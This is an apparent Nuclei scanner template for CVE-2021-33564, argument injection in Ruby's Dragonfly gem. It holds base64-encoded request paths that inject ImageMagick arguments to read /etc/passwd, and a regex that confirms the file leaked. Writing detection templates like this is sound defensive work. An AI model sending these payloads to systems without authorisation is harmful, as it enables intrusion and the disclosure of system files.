id: CVE-2021-33564 info: name: Argument Injection in Ruby Dragonfly author: 0xsapra severity: critical reference: https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/ tags: cve,cve2021,rce,ruby classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 cve-id: CVE-2021-33564 cwe-id: CWE-88 description: "An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility." requests: - method: GET path: - "{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==" - "{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==" matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:.*:0:0:"